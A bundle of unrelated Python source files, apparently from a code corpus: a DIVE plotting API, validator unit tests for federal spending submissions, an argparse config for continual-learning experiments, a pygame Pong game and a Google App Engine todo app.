self._dive_manager.add_table_row(dict(data_name=data_name, field_name=field_name, label=label, operation=operation, color_criteria=color_criteria, blend_colors=blend_colors, index=index))
def add_text_artist(self, axis_name, name, data_name, text_field, x_field, y_field, z_field=None, visible=True, draw_order=0, legend_text=None, x_anchor='center', y_anchor='center', font_size=12, bold=False, italic=False, color='black', color_field=None, colormap='viridis', color_label=None, color_unit=None):
"""
Add a text artist to an axis in DIVE.
Parameters
----------
axis_name : str
The name of the axis that this artist should be added to.
name : str
The name of this artist.
data_name : str
The name of the data object to use for this artist.
text_field : str
The name of the field in the data object that contains the text values for this artist.
x_field : str
The name of the field in the data object that contains the x coordinates for this artist.
y_field : str
The name of the field in the data object that contains the y coordinates for this artist.
z_field : None, str (Default: None)
The name of the field in the data object that contains the z coordinates for this artist.
If None, this artist will be two-dimensional.
visible : bool (Default: True)
Toggle whether this artist is visible.
draw_order : numeric (Default: 0)
The number used to determine the draw order for this artist.
Artists with small "draw_order" values are drawn before artists with large "draw_order" values.
legend_text : None, str (Default: None)
The label to display in the legend for this artist.
If None, this artist will not appear in the legend.
x_anchor : str (Default: "center")
The horizontal anchor for the text.
Allowed values are: "left", "center", "right"
y_anchor : str (Default: "center")
The vertical anchor for the text.
Allowed values are: "top", "center", "bottom"
font_size : numeric (Default: 12)
The font size to use for the text.
bold : bool (Default: False)
Toggle whether text is bold.
italic : bool (Default: False)
Toggle whether text is italicized.
color : str (Default: "black")
The color to use for the text.
It must be either a hex string (such as "#ff0000") or the name of a CSS color.
Only used if "color_field" is None.
color_field: None, str (Default: None)
The name of the field in the data object that contains color values for the text.
colormap: str (Default: "viridis")
The name of the colormap to use for the text.
Only used if "color_field" is not None.
color_label: None, str (Default: None)
The label to use for text color values on the colorbar.
Only used if "color_field" is not None.
color_unit: None, array (Default: None)
The unit to use for text color values on the colorbar.
If array, it must have the format: [from_unit, to_unit]
Only "pint" units are valid.
Only used if "color_field" is not None.
Notes
-----
When multiple color fields are in use in an axis (either in a single artist or across multiple artists),
all color fields that have the same colormap, color_label, and color_unit will share the same colorbar.
All colorbar values that aren't numeric or timestamps (with tz),
will instead be displayed in the legend (as long as "legend_text" is not None).
It is possible to cycle through the colorbars in an axis by clicking on the colorbar.
"""
self._dive_manager.add_artist(axis_name, 'text', dict(name=name, data_name=data_name, text_field=text_field, x_field=x_field, y_field=y_field, z_field=z_field, visible=visible, draw_order=draw_order, legend_text=legend_text, x_anchor=x_anchor, y_anchor=y_anchor, font_size=font_size, bold=bold, italic=italic, color=color, color_field=color_field, colormap=colormap, color_label=color_label, color_unit=color_unit))
def axis_limits_autoscale(self, name=None):
"""
Autoscale the limits of the specified axis/axes in DIVE.
Parameters
----------
name : None, str (Default: None)
The name of the axis to autoscale.
If None, the limits of every axis in DIVE will be autoscaled.
"""
self._dive_manager.axis_limits_autoscale(name)
def axis_limits_reset(self, name=None):
"""
Reset the limits of the specified axis/axes in DIVE.
Parameters
----------
name : None, str (Default: None)
The name of the axis to reset.
If None, the limits of every axis in DIVE will be reset.
"""
self._dive_manager.axis_limits_reset(name)
def display_axis(self, name=None):
"""
Display an axis in DIVE.
Parameters
----------
name : None, str (Default: None)
The name of the axis to display.
If None, no axis will be displayed.
"""
self._dive_manager.display_axis(name)
def display_axis_group(self, name=None):
"""
Display an axis group in DIVE.
Parameters
----------
name : None, str (Default: None)
The name of the axis group to display.
If None, no axis group will be displayed.
"""
self._dive_manager.display_axis_group(name)
def edit_artist(self, axis_name, name, **kwargs):
"""
Edit an artist in DIVE.
Parameters
----------
axis_name : str
The name of the axis that has the artist to be edited.
name : str
The name of the artist to edit.
**kwargs
Any of the parameters accepted by the function used to add the artist (except "name").
"""
self._dive_manager.edit_artist(axis_name, name, kwargs)
def edit_axis(self, name, **kwargs):
"""
Edit an axis in DIVE.
Parameters
----------
name : str
The name of the axis to edit.
**kwargs
Any of the parameters accepted by add_axis (except "name" and "axis_type").
"""
self._dive_manager.edit_axis(name, kwargs)
def edit_axis_group(self, name, **kwargs):
"""
Edit an axis group in DIVE.
Parameters
----------
name : str
The name of the axis group to edit.
**kwargs
Any of the parameters accepted by add_axis_group (except "name").
"""
self._dive_manager.edit_axis_group(name, kwargs)
def edit_data(self, name, **kwargs):
"""
Edit a data object in DIVE.
Parameters
----------
name : str
The name of the data object to edit.
**kwargs
Any of the parameters accepted by add_data (except "name").
"""
self._dive_manager.edit_data(name, kwargs)
def edit_filter_custom(self, name, **kwargs):
"""
Edit a custom filter group in DIVE.
Parameters
----------
name : str
The name of the custom filter group to edit.
**kwargs
Any of the parameters accepted by add_filter_custom (except "name").
"""
self._dive_manager.edit_filter('custom', name, kwargs)
def edit_filter_id(self, name, **kwargs):
"""
Edit an ID filter group in DIVE.
Parameters
----------
name : str
The name of the ID filter group to edit.
**kwargs
Any of the parameters accepted by add_filter_id (except "name").
"""
self._dive_manager.edit_filter('ID', name, kwargs)
def edit_filter_value(self, name, **kwargs):
"""
Edit a value filter group in DIVE.
Parameters
----------
name : str
The name of the value filter group to edit.
**kwargs
Any of the parameters accepted by add_filter_value (except "name").
"""
self._dive_manager.edit_filter('value', name, kwargs)
def edit_table_row(self, row_index, **kwargs):
"""
Edit a table row in DIVE.
Parameters
----------
row_index : int
The index of the table row to edit.
**kwargs
Any of the parameters accepted by add_table_row.
"""
self._dive_manager.edit_table_row(row_index, kwargs)
def get_animation_direction(self):
"""
Return the direction of the animation in DIVE.
Returns
-------
bool
Is the animation set to run in reverse.
"""
return self._dive_manager.get_animation_direction()
def get_animation_state(self):
"""
Return the state of the animation in DIVE.
Returns
-------
bool
Is the animation running.
"""
return self._dive_manager.get_animation_state()
def get_artist(self, axis_name=None, name=None):
"""
Return the parameters of the specified artist(s) in DIVE.
Parameters
----------
axis_name : None, str (Default: None)
The name of the axis containing the artist(s).
If None, a dict containing the parameters of every artist
in every axis will be returned.
name : None, str (Default: None)
The name of the artist to get parameters for.
If None, a list containing the parameters of every artist
in the specified axis will be returned.
Returns
-------
None, dict, list
The parameters of the specified artist(s).
Will be None if "axis_name" or "name" is invalid.
"""
return self._dive_manager.get_artist(axis_name, name)
def get_axis(self, name=None):
"""
Return the parameters of the specified axis/axes in DIVE.
Parameters
----------
name : None, str (Default: None)
The name of the axis to get parameters for.
If None, a list containing the parameters of every axis
in DIVE will be returned.
Returns
-------
None, dict, list
The parameters of the specified axis/axes.
Will be None if "name" is invalid.
"""
return self._dive_manager.get_axis(name)
def get_axis_group(self, name=None):
"""
Return the parameters of the specified axis group(s) in DIVE.
Parameters
----------
name : None, str (Default: None)
The name of the axis group to get parameters for.
If None, a list containing the parameters of every axis
group in DIVE will be returned.
Returns
-------
None, dict, list
The parameters of the specified axis group(s).
Will be None if "name" is invalid.
"""
return self._dive_manager.get_axis_group(name)
def get_current_time(self):
"""
Return the current time of the animation in DIVE.
Returns
-------
None, numeric, pandas.Timestamp with tz
The current time.
"""
return self._dive_manager.get_current_time()
def get_data(self, name=None):
"""
Return the parameters of the specified data object(s) in DIVE.
Parameters
----------
name : None, str (Default: None)
The name of the data object to get parameters for.
If None, a list containing the parameters of every data object
in DIVE will be returned.
Returns
-------
None, dict, list
The parameters of the specified data object(s).
Will be None if "name" is invalid.
"""
return self._dive_manager.get_data(name)
def get_filter_custom(self, name=None):
"""
Return the parameters of the specified custom filter group(s) in DIVE.
Parameters
----------
name : None, str (Default: None)
The name of the custom filter group to get parameters for.
If None, a list containing the parameters of every custom filter group
in DIVE will be returned.
Returns
-------
None, dict, list
The parameters of the specified custom filter group(s).
Will be None if "name" is invalid.
"""
return self._dive_manager.get_filter('custom', name)
def get_filter_id(self, name=None):
"""
Return the parameters of the specified ID filter group(s) in DIVE.
Parameters
----------
name : None, str (Default: None)
The name of the ID filter group to get parameters for.
If None, a list containing the parameters of every ID filter group
in DIVE will be returned.
Returns
-------
None, dict, list
The parameters of the specified ID filter group(s).
Will be None if "name" is invalid.
"""
return self._dive_manager.get_filter('ID', name)
def get_filter_value(self, name=None):
"""
Return the parameters of the specified value filter group(s) in DIVE.
Parameters
----------
name : None, str (Default: None)
The name of the value filter group to get parameters for.
If None, a list containing the parameters of every value filter group
in DIVE will be returned.
Returns
-------
None, dict, list
The parameters of the specified value filter group(s).
Will be None if "name" is invalid.
"""
return self._dive_manager.get_filter('value', name)
def get_filter_custom_indices(self, name=None):
"""
Return the indices of the specified custom filter group(s) in DIVE.
Parameters
----------
name : None, str (Default: None)
The name of the custom filter group to get indices for.
If None, a list containing the indices for every custom filter group
in DIVE will be returned.
Returns
-------
None, dict, list
The indices of the specified custom filter group(s).
Will be None if "name" is invalid.
"""
return self._dive_manager.get_filter_indices('custom', name)
def get_filter_id_indices(self, name=None):
"""
Return the indices of the specified ID filter group(s) in DIVE.
Parameters
----------
name : None, str (Default: None)
The name of the ID filter group to get indices for.
If None, a list containing the indices for every ID filter group
in DIVE will be returned.
Returns
-------
None, dict, list
The indices of the specified ID filter group(s).
Will be None if "name" is invalid.
"""
return self._dive_manager.get_filter_indices('ID', name)
def get_filter_indices(self):
"""
Return the combined indices of every enabled filter group in DIVE.
Returns
-------
dict
The combined indices of every enabled filter group in DIVE.
"""
return self._dive_manager.get_filter_indices(None, None)
def get_filter_value_indices(self, name=None):
"""
Return the indices of the specified value filter group(s) in DIVE.
Parameters
----------
name : None, str (Default: None)
The name of the value filter group to get indices for.
If None, a list containing the indices for every value filter group
in DIVE will be returned.
Returns
-------
None, dict, list
The indices of the specified value filter group(s).
Will be None if "name" is invalid.
"""
return self._dive_manager.get_filter_indices('value', name)
def get_interact_mode(self):
"""
Return the plotting canvas interaction mode in DIVE.
Returns
-------
str
The plotting canvas interaction mode in DIVE.
"""
return self._dive_manager.get_interact_mode()
def get_recording_state(self):
"""
Return the recording state in DIVE.
Returns
-------
bool
Is a recording in progress.
"""
return self._dive_manager.get_recording_state()
def get_settings(self):
"""
Return the settings in DIVE.
Returns
-------
dict
The settings in DIVE.
"""
return self._dive_manager.get_settings()
def get_table_row(self, index=None):
"""
Return the parameters of table rows in DIVE.
Parameters
----------
index : None, int (Default: None)
The index of the table row to get parameters for.
If None, a list containing the parameters of every table row
in DIVE will be returned.
Returns
-------
None, dict, list
The parameters of the specified table row(s).
Will be None if "index" is invalid.
"""
return self._dive_manager.get_table_row(index)
def get_time_limits(self):
"""
Return the time limits of the animation in DIVE.
Returns
-------
None, numeric, pandas.Timestamp with tz
The minimum time.
None, numeric, pandas.Timestamp with tz
The maximum time.
"""
return self._dive_manager.get_time_limits()
def record_video(self, file_path, start_time, stop_time, fps=None):
"""
Record a .mp4 video of the DIVE window for a period of time.
Parameters
----------
file_path : str
The path (including the file name) to where the video should be saved.
start_time : numeric, pandas.Timestamp with tz
The time value that the recording should start from.
stop_time : numeric, pandas.Timestamp with tz
The time value that the recording should stop at.
fps : None, int (Default: None)
The number of frames per second that the video should have.
If None, the fps in DIVE's settings will be used.
Notes
-----
If the "opencv-python" module hasn't been installed, this function won't do anything.
"""
self._dive_manager.record_video(file_path, start_time, stop_time, fps)
def remove_artist(self, axis_name=None, name=None):
"""
Remove an artist in DIVE.
Parameters
----------
axis_name : None, str (Default: None)
The name of the axis that has the artist to be removed.
If None, all artists in all axes will be removed.
name : None, str (Default: None)
The name of the artist to remove.
If None, all artists in the specified axis will be removed.
"""
self._dive_manager.remove_artist(axis_name, name)
def remove_axis(self, name=None):
"""
Remove an axis in DIVE.
Parameters
----------
name : None, str (Default: None)
The name of the axis to remove.
If None, all axes will be removed.
"""
self._dive_manager.remove_axis(name)
def remove_axis_group(self, name=None):
"""
Remove an axis group in DIVE.
Parameters
----------
name : None, str (Default: None)
The name of the axis group to remove.
If None, all axis groups will be removed.
"""
self._dive_manager.remove_axis_group(name)
def remove_data(self, name=None):
"""
Remove a data object in DIVE.
Parameters
----------
name : None, str (Default: None)
The name of the data object to remove.
If None, all data objects will be removed.
"""
self._dive_manager.remove_data(name)
def remove_filter_custom(self, name=None):
"""
Remove a custom filter group in DIVE.
Parameters
----------
name : None, str (Default: None)
The name of the custom filter group to remove.
If None, all custom filter groups will be removed.
"""
self._dive_manager.remove_filter('custom', name)
def remove_filter_id(self, name=None):
"""
Remove an ID filter group in DIVE.
Parameters
----------
name : None, str (Default: None)
The name of the ID filter group to remove.
If None, all ID filter groups will be removed.
"""
self._dive_manager.remove_filter('ID', name)
def remove_filter_value(self, name=None):
"""
Remove a value filter group in DIVE.
Parameters
----------
name : None, str (Default: None)
The name of the value filter group to remove.
If None, all value filter groups will be removed.
"""
self._dive_manager.remove_filter('value', name)
def remove_table_row(self, index=None):
"""
Remove a table row in DIVE.
Parameters
----------
index : None, int (Default: None)
The index of the table row to remove.
If None, all table rows will be removed.
"""
self._dive_manager.remove_table_row(index)
def set_animation_direction(self, reverse):
"""
Set the direction of the animation in DIVE.
Parameters
----------
reverse : bool
Toggle whether the animation should run in reverse.
"""
self._dive_manager.set_animation_direction(reverse)
def set_animation_state(self, running):
"""
Set the state of the animation in DIVE.
Parameters
----------
running : bool
Toggle whether the animation should be running.
"""
self._dive_manager.set_animation_state(running)
def set_current_time(self, time):
"""
Set the current time of the animation in DIVE.
Parameters
----------
time : numeric, pandas.Timestamp with tz
The time value to use.
"""
self._dive_manager.set_current_time(time)
def set_interact_mode(self, mode):
"""
Set the plotting canvas interaction mode in DIVE.
Parameters
----------
mode : str
The plotting canvas interaction mode to use.
Allowed values are: "pan", "zoom", "rectangle", "ellipse", "lasso"
"""
self._dive_manager.set_interact_mode(mode)
def set_settings(self, **kwargs):
"""
Set the settings in DIVE.
Parameters
----------
**kwargs
time_step : numeric
The number of seconds that the animation should increment for each frame of the animation.
fps : int
The number of frames per second that the animation should try to run at.
hold_time : numeric
The number of seconds of data prior to the current time that should be displayed for all artists.
If 0, all data up to the current time will be displayed.
table_change_time : numeric
The number of seconds that the table should keep a row color changed if it's "color_criteria" is set to "change".
timezone : str
The timezone to use for all time values in DIVE.
Only "pytz" timezones are valid.
clock_size : numeric
The font size to use for the clock below the plotting canvas in DIVE.
marking : str
The text to use for the marking below the plotting canvas in DIVE.
marking_color : str
The text color to use for the marking below the plotting canvas in DIVE.
marking_size : numeric
The font size to use for the marking below the plotting canvas in DIVE.
gui_theme : str
The theme to use for DIVE's GUI.
Allowed values are: "default", "light", "dark"
canvas_theme : str
The theme to use for the plotting canvas in DIVE.
Allowed values are: "light", "dark"
axis_label_size : numeric
The font size to use for axis labels.
axis_tick_size : numeric
The font size to use for axis ticks.
apply_limits_filter : bool
Toggle whether limits (axis, colorbar, time) should be calculated using the current filtered data.
and_filters : bool
Toggle whether filter groups in DIVE should be merged using AND.
If False, filter groups will be merged using OR.
Notes
-----
If the "qdarkstyle" module hasn't been installed, "gui_theme" will be ignored.
"""
self._dive_manager.set_settings(kwargs)
def take_screenshot(self, file_path):
"""
Save a .png image of the DIVE window.
Parameters
----------
file_path : str
The path (including the file name) to where the image should be saved.
"""
self._dive_manager.take_screenshot(file_path)
def toggle_toolbar(self, reset=True, autoscale=True, pan=True, zoom=True, selection=True, display_axis=True, config_axes=True, config_axis_groups=True, config_data=True, config_table_rows=True, filter_data=True, settings=True, inspect_data=True, screenshot=True, record=True):
"""
Toggle the visibility of the toolbar buttons in DIVE.
Parameters
----------
reset : bool (Default: True)
Toggle the visibility of the "Reset Axis Limits" button.
autoscale : bool (Default: True)
Toggle the visibility of the "Autoscale Axis Limits" button.
pan : bool (Default: True)
Toggle the visibility of the "Pan" button.
zoom : bool (Default: True)
Toggle the visibility of the "Zoom" button.
selection : bool (Default: True)
Toggle the visibility of the selection button and its menu.
display_axis : bool (Default: True)
Toggle the visibility of the "Display Axis" button.
config_axes : bool (Default: True)
Toggle the visibility of the "Configure Axes/Artists" menu option.
config_axis_groups : bool (Default: True)
Toggle the visibility of the "Configure Axis Groups" menu option.
config_data : bool (Default: True)
Toggle the visibility of the "Configure Data Selection" menu option.
config_table_rows : bool (Default: True)
Toggle the visibility of the "Configure Table Rows" menu option.
filter_data : bool (Default: True)
Toggle the visibility of the "Filter Data" button.
settings : bool (Default: True)
Toggle the visibility of the "Settings" button.
inspect_data : bool (Default: True)
Toggle the visibility of the "Inspect Data" button.
screenshot : bool (Default: True)
Toggle the visibility of the "Take Screenshot" button.
record : bool (Default: True)
Toggle the visibility of the "Record Video" button.
"""
self._dive_manager.toggle_toolbar(dict(reset=reset, autoscale=autoscale, pan=pan, zoom=zoom, selection=selection, display_axis=display_axis, config_axes=config_axes, config_axis_groups=config_axis_groups, config_data=config_data, config_table_rows=config_table_rows, filter_data=filter_data, settings=settings, inspect_data=inspect_data, screenshot=screenshot, record=record))
|
<gh_stars>1-10
from tests.unit.dataactcore.factories.staging import ObjectClassProgramActivityFactory
from tests.unit.dataactcore.factories.job import SubmissionFactory
from dataactcore.models.jobModels import PublishStatus
from dataactcore.models.lookups import PUBLISH_STATUS, PUBLISH_STATUS_DICT
from tests.unit.dataactvalidator.utils import number_of_errors, insert_submission
_FILE = 'a16_object_class_program_activity'
def populate_publish_status(database):
for ps in PUBLISH_STATUS:
status = PublishStatus(publish_status_id=ps.id, name=ps.name, description=ps.desc)
database.session.merge(status)
database.session.commit()
def test_value_present(database):
"""gross_outlays_delivered_or_fyb populated does not require a previous submission"""
populate_publish_status(database)
sub_new = SubmissionFactory()
ocpa_new = ObjectClassProgramActivityFactory(submission_id=sub_new.submission_id)
assert number_of_errors(_FILE, database, submission=sub_new, models=[ocpa_new]) == 0
def test_previous_published(database):
""" gross_outlays_delivered_or_fyb can be null if previous published submission shares cgac and fiscal year """
populate_publish_status(database)
sub_prev_published = SubmissionFactory(publish_status_id=PUBLISH_STATUS_DICT['published'])
insert_submission(database, sub_prev_published)
sub_new_published = SubmissionFactory(cgac_code=sub_prev_published.cgac_code,
reporting_fiscal_year=sub_prev_published.reporting_fiscal_year)
ocpa_new_published = ObjectClassProgramActivityFactory(submission_id=sub_new_published.submission_id,
gross_outlays_delivered_or_fyb=None,
ussgl480100_undelivered_or_fyb=None)
assert number_of_errors(_FILE, database, submission=sub_new_published,
models=[ocpa_new_published]) == 0
def test_previous_publishable(database):
""" Previous submission marked as publishable also allows null """
populate_publish_status(database)
sub_prev_publishable = SubmissionFactory(publishable=True)
insert_submission(database, sub_prev_publishable)
sub_new_publishable = SubmissionFactory(cgac_code=sub_prev_publishable.cgac_code,
reporting_fiscal_year=sub_prev_publishable.reporting_fiscal_year)
ocpa_new_publishable = ObjectClassProgramActivityFactory(submission_id=sub_new_publishable.submission_id,
gross_outlays_delivered_or_fyb=None)
assert number_of_errors(_FILE, database, submission=sub_new_publishable,
models=[ocpa_new_publishable]) == 0
def test_no_previous_submission(database):
""" No previous submission and null gross_outlays_delivered_or_fyb """
populate_publish_status(database)
sub_new = SubmissionFactory()
ocpa_new = ObjectClassProgramActivityFactory(submission_id=sub_new.submission_id,
gross_outlays_delivered_or_fyb=None)
assert number_of_errors(_FILE, database, submission=sub_new, models=[ocpa_new]) == 1
def test_previous_unpublished(database):
""" previous submission exists but is unpublished and has not been marked publishable """
populate_publish_status(database)
sub_prev_published = SubmissionFactory(publish_status_id=PUBLISH_STATUS_DICT['unpublished'], publishable=False)
insert_submission(database, sub_prev_published)
sub_new_published = SubmissionFactory(cgac_code=sub_prev_published.cgac_code,
reporting_fiscal_year=sub_prev_published.reporting_fiscal_year)
ocpa_new_published = ObjectClassProgramActivityFactory(submission_id=sub_new_published.submission_id,
ussgl480100_undelivered_or_fyb=None,
ussgl490800_undelivered_or_fyb=None)
assert number_of_errors(_FILE, database, submission=sub_new_published,
models=[ocpa_new_published]) == 1
|
import argparse
def get_args():
parser = argparse.ArgumentParser(description='Continual')
# Arguments
parser.add_argument('--seed', type=int, default=0, help='(default=%(default)d)')
parser.add_argument('--experiment', default='', type=str, required=True,
choices=['mnist2',
'pmnist',
'split_pmnist',
'row_pmnist',
'mixture',
'omniglot',
'split_mnist',
'split_notmnist',
'split_row_pmnist',
'split_cifar10_100',
'split_cifar100',
'split_cifar100_20',
'split_CUB200',
'split_tiny_imagenet',
'split_mini_imagenet',
'split_cifar10'],
help='(default=%(default)s)')
parser.add_argument('--approach', default='', type=str, required=True,
choices=['random',
'sgd',
'sgd-frozen',
'sgd_with_log',
'sgd_L2_with_log',
'lwf','lwf_with_log',
'lfl',
'ewc',
'si',
'rwalk',
'mas',
'ucl',
'ucl_ablation',
'baye_fisher',
'baye_hat',
'imm-mean',
'progressive',
'pathnet',
'imm-mode',
'sgd-restart',
'joint',
'hat',
'hat-test'],
help='(default=%(default)s)')
parser.add_argument('--optimizer', default='Adam', type=str, required=False,
choices=['SGD',
'SGD_momentum_decay',
'Adam'],
help='(default=%(default)s)')
parser.add_argument('--ablation', default='None', type=str, required=False,
choices=['no_L1',
'no_upper',
'no_lower',
'no_sigma_normal',
'None'],
help='(default=%(default)s)')
parser.add_argument('--output', default='', type=str, required=False, help='(default=%(default)s)')
parser.add_argument('--nepochs', default=100, type=int, required=False, help='(default=%(default)d)')
parser.add_argument('--unitN', default=400, type=int, required=False, help='(default=%(default)d)')
parser.add_argument('--batch-size', default=256, type=int, required=False, help='(default=%(default)d)')
parser.add_argument('--lr', default=0.001, type=float, required=False, help='(default=%(default)f)')
parser.add_argument('--lr_rho', default=0.001, type=float, required=False, help='(default=%(default)f)')
parser.add_argument('--ratio', default='0.5', type=float, help='(default=%(default)f)')
parser.add_argument('--alpha', default=0.01, type=float, help='(default=%(default)f)')
parser.add_argument('--beta', default='0.03', type=float, help='(default=%(default)f)')
parser.add_argument('--gamma', default=0.75, type=float, help='(default=%(default)f)')
parser.add_argument('--smax', default=400, type=float, help='(default=%(default)f)')
parser.add_argument('--lamb', default='1', type=float, help='(default=%(default)f)')
parser.add_argument('--c', default='0.9', type=float, help='(default=%(default)f)')
parser.add_argument('--date', type=str, default='', help='(default=%(default)s)')
parser.add_argument('--tasknum', default=50, type=int, help='(default=%(default)s)')
parser.add_argument('--conv-net', action='store_true', default=False, help='Using convolution network')
parser.add_argument('--rebuttal', action='store_true', default=False, help='Using convolution network')
parser.add_argument('--parameter',type=str,default='',help='(default=%(default)s)')
parser.add_argument('--sample', type = int, default=1, help='Using sigma max to support coefficient')
parser.add_argument('--rho', type = float, default=-2.783, help='initial rho')
args=parser.parse_args()
return args |
# -*- coding: utf-8 -*-
import pygame
from pygame.locals import *
from random import randint
# Initialize Pygame
pygame.init()
pygame.font.init()
fontLG = pygame.font.SysFont('Arial', 30)
fontSM = pygame.font.SysFont('Arial', 16)
clock = pygame.time.Clock()
# Globals
WHITE = (255, 255, 255)
ISDOWN = pygame.key.get_pressed()
BOOL = {True: 1, False: 0}
SPEED = 3
GAME_LIMIT = 5
PLAYER_WON = None
REMATCH_TIMER = 10
RUNNING = True
# Screen
pygame.display.set_caption("Pong")
screen = pygame.display.set_mode((800, 480), 0, 32)
width, height = pygame.display.get_surface().get_size()
screen.fill((0, 0, 0))
# Objects
class Ball:
def __init__(self, x, y, vx, vy):
self.x = x
self.y = y
self.vx = vx
self.vy = vy
class Player:
def __init__(self, x, y, score):
self.x = x
self.y = y
self.score = score
ball = Ball(width/2, height/2, -SPEED, SPEED)
player1 = Player(10, height/2, 0)
player2 = Player(width - 30, height/2, 0)
def initial_game_state(
white=(255, 255, 255),
is_down=pygame.key.get_pressed(),
bool_value={True: 1, False: 0}, speed=3,
game_limit=5, player_won=None, rematch_timer=10, running=True):
global WHITE
global ISDOWN
global BOOL
global SPEED
global GAME_LIMIT
global PLAYER_WON
global REMATCH_TIMER
global RUNNING
global ball
global player1
global player2
WHITE = white
ISDOWN = is_down
BOOL = bool_value
SPEED = speed
GAME_LIMIT = game_limit
PLAYER_WON = player_won
REMATCH_TIMER = rematch_timer
RUNNING = running
ball = Ball(width/2, height/2, -SPEED, SPEED)
player1 = Player(10, height/2, 0)
player2 = Player(width - 30, height/2, 0)
def update():
global RUNNING
global SPEED
global PLAYER_WON
pygame.event.pump()
ISDOWN = pygame.key.get_pressed()
if player1.score == GAME_LIMIT:
RUNNING = False
PLAYER_WON = 1
return
elif player2.score == GAME_LIMIT:
RUNNING = False
PLAYER_WON = 2
return
player1.y = player1.y + \
(BOOL[ISDOWN[pygame.K_a]] - BOOL[ISDOWN[pygame.K_q]]) * 7
player2.y = player2.y + \
(BOOL[ISDOWN[pygame.K_DOWN]] - BOOL[ISDOWN[pygame.K_UP]]) * 7
if player1.y < 100:
player1.y = 100
if player1.y > (height - 60):
player1.y = height - 60
if player2.y < 100:
player2.y = 100
if player2.y > (height - 60):
player2.y = height - 60
ball.x = ball.x + ball.vx
ball.y = ball.y + ball.vy
if abs(ball.y) >= (height - 20):
ball.vy = -ball.vy
if abs(ball.y) <= 60:
ball.vy = -ball.vy
if ball.x < 40 and ball.x > 20 and abs(player1.y - ball.y) < 60:
SPEED = SPEED + 0.2
ball.x = 40
ball.vx = SPEED
ball.vy = ball.vy * 0.5 + randint(-10, 10) / 20 * SPEED
if ball.x < -10:
ball.x = width/3 * 2
ball.y = height/2
SPEED = 3
ball.vx = -SPEED
ball.vy = -SPEED
player2.score = player2.score + 1
if ball.x > (width - 40) and ball.x < (width - 20) and abs(player2.y - ball.y) < 60:
SPEED = SPEED + 0.5
ball.x = (width - 40)
ball.vx = -SPEED
ball.vy = ball.vy * 0.8 + randint(-10, 10) / 10 * SPEED
if ball.x > width + 10:
ball.x = width/3
ball.y = height/2
SPEED = 3
ball.vx = SPEED
ball.vy = SPEED
player1.score = player1.score + 1
for event in pygame.event.get():
if event.type == QUIT:
RUNNING = False
def draw():
title = fontLG.render("PONG", False, WHITE)
screen.blit(title, (width/2 - title.get_size()[0]/2, 10))
pygame.draw.rect(screen, WHITE, [player1.x, player1.y - 50, 20, 100])
pygame.draw.rect(screen, WHITE, [player2.x, player2.y - 50, 20, 100])
pygame.draw.circle(screen, WHITE, [int(ball.x), int(ball.y)], 10)
score1 = fontLG.render(str(player1.score), False, WHITE)
screen.blit(score1, (10, 10))
instructions1 = fontSM.render("P1 Keys: Q and A", False, WHITE)
screen.blit(instructions1, (score1.get_size()[0] + 20, 18))
score2 = fontLG.render(str(player2.score), False, WHITE)
screen.blit(score2, (width - score2.get_size()[0] - 10, 10))
instructions2 = fontSM.render("P2 Keys: UP and DOWN", False, WHITE)
screen.blit(instructions2, (width - score2.get_size()
[0] - 20 - instructions2.get_size()[0], 18))
def drawGameEnd():
screen.fill((0, 0, 0))
title = fontLG.render("Player {0} won!".format(PLAYER_WON), False, WHITE)
screen.blit(title, (width/2 - title.get_size()[0]/2, height/4))
message = fontSM.render("Up for a rematch? (y / n)", False, WHITE)
screen.blit(message, (width/2 - message.get_size()[0]/2, height/2))
message = fontSM.render("({0})".format(REMATCH_TIMER), False, WHITE)
screen.blit(message, (width/2 - message.get_size()[0]/2, 3*height/4))
pygame.display.flip()
def main():
global RUNNING
initial_game_state()
while RUNNING:
print("Game running")
screen.fill((0, 0, 0))
update()
draw()
clock.tick(60)
pygame.display.flip()
if not game_end():
print("Game restarted")
main()
def game_end():
global REMATCH_TIMER
result = True
while True:
# Retry or not
events = pygame.event.get()
selected = None
for event in events:
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_y:
print("Yes pressed!")
selected = "y"
break
elif event.key == pygame.K_n:
selected = "n"
break
# Has the timer ended?
if REMATCH_TIMER <= 0:
result = True
break
# Check selected
if selected == "y":
result = False
break
elif selected == "n":
result = True
break
# Keeps counting down
REMATCH_TIMER -= 1
drawGameEnd()
pygame.time.wait(1000)
return result
if RUNNING:
main()
pygame.quit()
|
<gh_stars>0
from google.appengine.api import users
from google.appengine.ext import webapp
from google.appengine.ext.webapp.util import run_wsgi_app
from google.appengine.ext import db
from google.appengine.ext.webapp import template
from google.appengine.api import mail
# Todo defines the data model for the Todos
# as it extends db.model the content of the class will automatically stored
class TodoModel(db.Model):
author = db.UserProperty(required=True)
shortDescription = db.StringProperty(required=True)
longDescription = db.StringProperty(multiline=True)
url = db.StringProperty()
created = db.DateTimeProperty(auto_now_add=True)
updated = db.DateTimeProperty(auto_now=True)
dueDate = db.StringProperty(required=True)
finished = db.BooleanProperty()
# The main page where the user can login and logout
# MainPage is a subclass of webapp.RequestHandler and overwrites the get method
class MainPage(webapp.RequestHandler):
def get(self):
user = users.get_current_user()
url = users.create_login_url(self.request.uri)
url_linktext = 'Login'
if user:
url = users.create_logout_url(self.request.uri)
url_linktext = 'Logout'
# GQL is similar to SQL
todos = TodoModel.gql("WHERE author = :author and finished=false",
author=users.get_current_user())
values = {
'todos': todos,
'numbertodos' : todos.count(),
'user': user,
'url': url,
'url_linktext': url_linktext,
}
self.response.out.write(template.render('index.html', values))
# This class creates a new Todo item
class New(webapp.RequestHandler):
def post(self):
user = users.get_current_user()
if user:
testurl = self.request.get('url')
if not testurl.startswith("http://") and testurl:
testurl = "http://"+ testurl
todo = TodoModel(
author = users.get_current_user(),
shortDescription = self.request.get('shortDescription'),
longDescription = self.request.get('longDescription'),
dueDate = self.request.get('dueDate'),
url = testurl,
finished = False)
todo.put();
self.redirect('/')
# This class deletes the selected Todo
class Done(webapp.RequestHandler):
def get(self):
user = users.get_current_user()
if user:
raw_id = self.request.get('id')
id = int(raw_id)
todo = TodoModel.get_by_id(id)
todo.delete()
self.redirect('/')
#This class emails the task to yourself
class Email(webapp.RequestHandler):
def get(self):
user = users.get_current_user()
if user:
raw_id = self.request.get('id')
id = int(raw_id)
todo = TodoModel.get_by_id(id)
message = mail.EmailMessage(sender=user.email(),
subject=todo.shortDescription)
message.to = user.email()
message.body = todo.longDescription
message.send()
self.redirect('/')
# Register the URL with the responsible classes
application = webapp.WSGIApplication(
[('/', MainPage),
('/new', New),
('/done', Done),
('/email', Email)],
debug=True)
# Register the wsgi application to run
def main():
run_wsgi_app(application)
